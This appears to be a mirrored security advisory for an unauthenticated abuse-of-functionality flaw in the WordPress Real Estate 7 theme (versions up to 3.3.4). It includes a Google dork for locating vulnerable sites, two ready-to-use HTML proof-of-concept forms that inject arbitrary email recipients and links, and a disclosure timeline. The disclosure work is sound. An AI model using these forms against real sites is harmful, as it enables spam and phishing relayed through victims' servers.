Share
## https://sploitus.com/exploit?id=1337DAY-ID-38241
==== [ Z://USB-00_RESEARCH/WORDPRESS/ ] ============================================= [ 2023 ] ==
Report Title: WordPress Real Estate 7 Theme <= 3.3.4 - Abuse of Functionality
Google Dork: inurl:/wp-content/themes/realestate-7/
Research Date: 2023-02-10
Researcher: FearZzZz [ https://fearzzzz.ru ]
Component Vendor: Contempo Themes [ https://contempothemes.com ]
Vulnerable Version: <= 3.3.4
Component Link: https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
CVSS Base Score: 7.2 (High)
CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L
OWASP Top 10: A04: 2021 – Insecure Design
CWE: CWE-472
CVE: TBA
=================================================================================================
#### [ Description: ]
The Real Estate 7 theme for WordPress is vulnerable to Abuse of Functionality via the `ctyouremail` parameter in the `/includes/ajax-submit-favorites.php` and `/includes/ajax-submit-listings.php` files in versions up to, and including, v3.3.4. This makes it possible for unauthenticated attackers to use implemented functions from the vulnerable service to invoke unintended/malicious outcomes.
#### [ Impact: ]
If a web application doesn't properly protect assumed-immutable values from modification in hidden form fields, parameters, cookies, or URLs, this can lead to modification of critical data. Improper validation of data that are user-controllable can lead to the application processing incorrect, and often malicious, input.
#### [ Proof-of-Concept: ]
```
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://fearzzzz.ru/wp-content/themes/realestate-7/includes/ajax-submit-favorites.php" method="POST">
<input type="hidden" name="ctsubject" value="Fear is Big Business" />
<input type="hidden" name="name" value="FearZzZz" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="ctphone" value="no" />
<input type="hidden" name="message" value="Fear is Big Business" />
<input type="hidden" name="ctyouremail" value="[email protected]" />
<input type="hidden" name="ctproperty" value="https://fearzzzz.ru" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
```
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://fearzzzz.ru/wp-content/themes/realestate-7/includes/ajax-submit-listings.php" method="POST">
<input type="hidden" name="listing_id" value="451" />
<input type="hidden" name="ctsubject" value="Fear is Big Business" />
<input type="hidden" name="name" value="FearZzZz" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="ctphone" value="" />
<input type="hidden" name="message" value="Fear is Big Business" />
<input type="hidden" name="ctyouremail" value="[email protected]" />
<input type="hidden" name="ctproperty" value="Z" />
<input type="hidden" name="ctlistingstreet" value="Z" />
<input type="hidden" name="ctlistingcity" value="Z" />
<input type="hidden" name="ctlistingstate" value="Z" />
<input type="hidden" name="ctlistingzip" value="Z" />
<input type="hidden" name="ctpermalink" value="https://fearzzzz.ru" />
<input type="hidden" name="ctlistingprice" value="Z" />
<input type="hidden" name="ctlistingsqft" value="Z" />
<input type="hidden" name="ctlistingbeds" value="" />
<input type="hidden" name="ctlistingbaths" value="" />
<input type="hidden" name="ctlistinglotsize" value="" />
<input type="hidden" name="ctlistingmlsnumber" value="" />
<input type="hidden" name="ctlistingpropertytype" value="Detached" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
#### [ Timeline: ]
2023.02.08 - Real Estate 7 Theme v3.3.4 released.
2023.02.10 - Vulnerability has been discovered.
2023.02.15 - Vendor notified.
2023.02.16 - Chris Robinson responded that the vulnerabilities have been fixed. The release of the new version v3.3.5 is scheduled for March 6.